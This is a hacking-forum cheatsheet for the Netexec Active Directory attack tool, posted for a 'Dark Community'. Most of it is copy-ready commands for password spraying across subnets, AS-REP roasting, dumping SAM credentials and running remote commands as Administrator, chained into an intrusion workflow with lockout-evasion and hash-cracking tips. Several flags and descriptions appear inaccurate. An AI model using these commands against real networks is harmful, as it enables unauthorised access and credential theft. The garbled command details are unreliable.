Cracking 🔓 Netexec - SMB/WinRM/SSH Enumeration & Exploitation Toolkit (CrackMapExec Successor) - Cheatsheet, Tips and Cracking Techniques

[dEEpEst]

Netexec - SMB/WinRM/SSH Enumeration & Exploitation Toolkit (CrackMapExec Successor)


This post was created for the Hack Tools Dark Community.


Netexec is a powerful post-exploitation and enumeration tool designed for red team operations in Active Directory environments.
It replaces CrackMapExec and improves functionality, speed, and modularity. Below is a complete guide with examples and advanced usage.

Disclaimer: This content is for educational purposes only and must be used exclusively in authorized environments.
Neither the author nor the HTDark community is responsible for any misuse.


What is Netexec?
Netexec (formerly known as CrackMapExec 6.x) is a Swiss army knife for AD network reconnaissance and exploitation.
It allows enumeration, authentication testing, command execution, file interaction, and more across SMB, WinRM, SSH, MSSQL, LDAP, and Kerberos.

Installation

pipx install git+https://github.com/Pennyw0rth/NetExec.git
# Or using pip:
pip install git+https://github.com/Pennyw0rth/NetExec.git

Modules Supported

• smb
• winrm
• ssh
• mssql
• ldap
• kerberos

Basic Syntax

netexec <protocol> <target> -u <user> -p <pass>

Examples

Enumerate SMB shares and users:

netexec smb 192.168.1.10 -u user -p pass

Execute command over WinRM:

netexec winrm 192.168.1.10 -u Administrator -p pass --exec whoami

Check local admin access across a subnet:

netexec smb 192.168.1.0/24 -u user -p pass --local-auth

Kerberos brute-force using AS-REP roasting:

netexec kerberos <DC-IP> -u usernames.txt --asreproast

Spray passwords over SMB (password spraying):

netexec smb 192.168.1.0/24 -u users.txt -p "Summer2024" --continue-on-success

Useful Options

• -u / -p = username/password (or -U/-P for files)
• --local-auth = authenticate locally instead of domain
• --shares = enumerate accessible shares
• --sessions = list active sessions
• --sam = dump user accounts (if permissions allow)
• --exec <cmd> = run remote command (WinRM or SMB)
• --kerberos = use Kerberos auth with ticket
• --asreproast / --kerberoast = extract TGTs or service tickets for offline cracking

Tips & Tricks

• Use spray techniques carefully: Add delays or restrict to avoid account lockouts
• Chain with Impacket tools: Use hashes/tickets dumped with Netexec in `secretsdump`, `psexec`, etc.
• Crack TGTs with Hashcat: Format them from Netexec’s output and feed to Hashcat with `-m 18200`
• Use `--json` output: For parsing results with automation/scripts
• Proxy support: Through SOCKS with `proxychains` if needed

Real-World Workflow

# 1. Password spray
netexec smb 10.0.0.0/24 -u users.txt -p "Welcome123" --continue-on-success

# 2. Enumerate shares and sessions
netexec smb 10.0.0.15 -u user -p pass --shares --sessions

# 3. Dump SAM (if admin)
netexec smb 10.0.0.15 -u user -p pass --sam

# 4. Execute command via WinRM
netexec winrm 10.0.0.15 -u Administrator -p pass --exec "whoami"

Resources & Links

• This link is hidden for visitors. Please Log in or register now.
  – Official GitHub
• This link is hidden for visitors. Please Log in or register now.
  – Official documentation
• This link is hidden for visitors. Please Log in or register now.
  – Great for AD post-exploitation techniques

---

Have you already replaced CrackMapExec with Netexec?
Which modules or tricks work best in your red team engagements?

Drop your insights and join the discussion!